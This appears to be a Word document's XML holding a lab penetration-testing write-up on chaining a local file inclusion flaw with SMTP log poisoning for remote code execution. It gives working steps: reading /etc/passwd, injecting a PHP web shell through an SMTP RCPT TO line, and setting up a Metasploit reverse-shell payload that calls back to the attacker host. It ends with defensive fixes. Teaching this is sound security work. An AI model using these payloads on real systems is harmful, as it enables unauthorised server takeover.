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34"/>
        </w:rPr>
        <w:t>SMTP Log Poisoning through LFI to Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Educational write-up — authorized penetration testing / lab environment only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This document describes a compound attack chain that combines a Local File Inclusion (LFI) vulnerability with abuse of the SMTP mail service to achieve Remote Code Execution (RCE) on a target web server. The core idea is simple but powerful: if a web application lets an attacker include arbitrary local files, and the SMTP service writes attacker-controlled data into a log file that is readable through that same LFI, then PHP code injected into the mail log can be executed by the web server. The technique is intended strictly for study in a controlled lab or an engagement where explicit authorization exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Lab / Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The target is a Linux web server running a vulnerable PHP page and an SMTP service (e.g. Postfix) that logs mail transactions to a world-readable log file such as /var/log/mail.log. The attacker machine runs standard tooling: Nmap for discovery, a Telnet client to talk to SMTP, and the Metasploit Framework for the final payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.107 (vulnerable PHP app + SMTP on port 25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker: </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.109 (Nmap, Telnet, Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Step 1 — Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm the SMTP service is listening before attempting log poisoning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nmap -p25 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The scan confirms port 25/tcp (SMTP) is open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Step 2 — Confirm the LFI Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The application exposes a file parameter that includes local files without sanitisation. Reading a known system file confirms the flaw and proves the mail log is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The contents of /etc/passwd and the SMTP log are returned, confirming read access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Step 3 — Poison the SMTP Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Connect to the SMTP service with Telnet and inject a PHP one-liner into a field that is written verbatim to the mail log. A '501 Bad recipient address syntax' error is expected and does not stop the payload from being logged:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>telnet 192.168.1.107 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MAIL FROM:&lt;attacker@example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RCPT TO:&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. Step 4 — Trigger Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Include the poisoned log through the LFI and pass a shell command via the injected 'c' parameter. The PHP engine now parses and executes the payload stored in the log:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&amp;c=ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The output of ifconfig appears in the response, confirming arbitrary command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7. Step 5 — Upgrade to an Interactive Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use the Metasploit web_delivery module to turn single-command execution into a full session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lhost 192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lport 8888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Paste the generated PHP payload into the 'c' parameter of the LFI URL to trigger it, then interact with the session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A Meterpreter session is established, giving full interactive access to the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SMTP log poisoning is a classic example of how two individually limited issues — an LFI that only seems to allow file reading, and an SMTP service that trustingly logs user input — combine into full remote code execution. Defensively, the chain breaks at any single link: sanitise and whitelist file-inclusion parameters, never let the web server parse log files as PHP, store logs outside the web root with least-privilege permissions, and sanitise data written by network services. The lesson for testers is to always consider how low-severity findings can be chained into critical impact.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